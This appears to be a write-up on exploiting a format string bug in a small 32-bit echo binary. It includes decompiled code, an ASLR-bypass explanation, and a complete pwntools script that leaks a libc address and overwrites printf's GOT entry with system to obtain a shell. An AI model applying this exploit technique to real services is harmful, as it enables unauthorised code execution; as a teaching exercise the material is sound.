About the binary
This binary was sent to me by a friend, asking me if it can be exploited. He told me that the vulnerability doesn’t seem to be a buffer overflow, and that he didn’t find any other ways to attack it.
Initial Exploration
Let’s see what kind of binary we’re working on.
$ file simple_echosimple_echo: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=208d64568158fab20eff47c6bc1351e3557076d0, not stripped$ pwn checksec simple_echo[*] '/path/to/simple_echo' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)
It’s nice to see that the binary is dynamically linked and is not stripped. This helps taking less time on reversing the binary (hopefully) and have more time figuring out the exploit.
Reversing the binary
The main
function simply calls a function named cat
after a setvbuf
int __cdecl main(int argc, const char **argv, const char **envp){ setvbuf(stdout, 0, 2, 0); cat(); return 0;}
And cat
goes in a loop, where it reads stdin, stores to buffer, then prints out the buffer for every read using a printf
.
ssize_t cat(){ ssize_t result; // eax char format[256]; // [esp+Ch] [ebp-10Ch] BYREF ssize_t v2; // [esp+10Ch] [ebp-Ch]
v2 = 0; while ( 1 ) { result = read(0, format, 0xFFu); v2 = result; if ( result <= 0 ) break; format[v2] = 0; printf(format); } return result;}
And for printf
, it’s a jump to an address that is to be provided after loading libc.
This is because the implementation for printf is loaded dynamically.
jmp *0x804A010
Strategy
We know how we can use printf to peek the values on the stack, and to write stuff.
Now with these techniques in mind, we want to have some strategy when writing our exploit.
Fundamental Goal: have power on where we can write with %n
and be able to compute how many characters to print.
Ultimate Goal: Overwrite address of printf in got so it goes to system instead, making the program an interactive shell, basically.
- We can use the buffer used by read. That’s actually plenty of space! We will write the addresses we will overwrite there, and we will put the format string payload there as well.
- We need to find where the buffer is on the stack. Recall accessing nth argument of printf.
- Enter the addresses for the half-byte overwrites
- Compute the number of chars to print for one half of the 4 bytes then overwrite.
- Compute the number of chars to print for the other half of the 4 bytes then overwrite.
- Any lines to be entered from here on should be passed to system() instead of printf()
Defeating Address Space Layout Randomization (ASLR)
Modern computers use address space layout randomization (ASLR) for loading dynamically linked libraries. Because libc is one such library, the loaded addresses for the libc functions we see during debugging actually don’t necessarily show up when we run the binary without debugging. They get randomized! How can we defeat ASLR to have a consistent exploit?
We still have a good amount of control over the program with the format string vulnerability. In fact, our control is so strong we can still determine where in the memory a libc function is during runtime. We can look up the offset of that libc function in the libc file being loaded, and figure out the libc base address after being loaded dynamically, leaking the whole of libc overall, as we can map all the other libc functions during runtime.
To have a consistent exploit, we leak the libc base address using the format string vulnerability before we proceed to overwriting addresses.
Exploit code
#!/usr/bin/env python3
from pwn import *
binary = ELF("./simple_echo")p = binary.process()
# ====== LEAK =======
libc_start_main_reloc = 0x0804a014 # where pointer to libc_start_main is stored
# libc function offsets (this varies depending on the system's libc; find it yourself)libc_start_main_offset = 0x0001f170 # for leaking libc addresssystem_offset = 0x00049680 # our target value
exploit = b""exploit += p32(libc_start_main_reloc)exploit += b"%7$4s"
log.info("leaking libc address")log.info("Leak payload: %s" % repr(exploit))
p.sendline(exploit)p.recv(4) # we don't need this (this is just an echo of libc_start_main_reloc)leak = u32(p.recv(4)) # get the next four-byte chunk (this is the leaked address)p.recvline() # the rest is junk to uslibc_base = leak - libc_start_main_offset
log.info("libc is leaked! base address: %s" % hex(libc_base))
# ====== OVERWRITE =======
printf_reloc = 0x0804A010 # this is where we will overwrite
# we can now figure out where system() will besystem = libc_base + system_offset
# for overwriting lower two byteslower_half_adjustment = ((system & 0xffff) - 8)
exploit = b""exploit += p32(printf_reloc)exploit += p32(printf_reloc + 2)exploit += b"%7$" + b"%dx" % lower_half_adjustmentexploit += b"%7$hn"
# for overwriting upper two bytesupper_half_adjustment = (system >> 16) - lower_half_adjustment - 8
exploit += b"%8$" + b"%dx" % upper_half_adjustmentexploit += b"%8$hn"
log.info("overwrite payload: %s", repr(exploit))
p.sendline(exploit)p.recvline()log.info("overwrite payload sent. getting shell now weeeeee.")log.info("note: Ctrl+C or Ctrl+D to close")
p.interactive()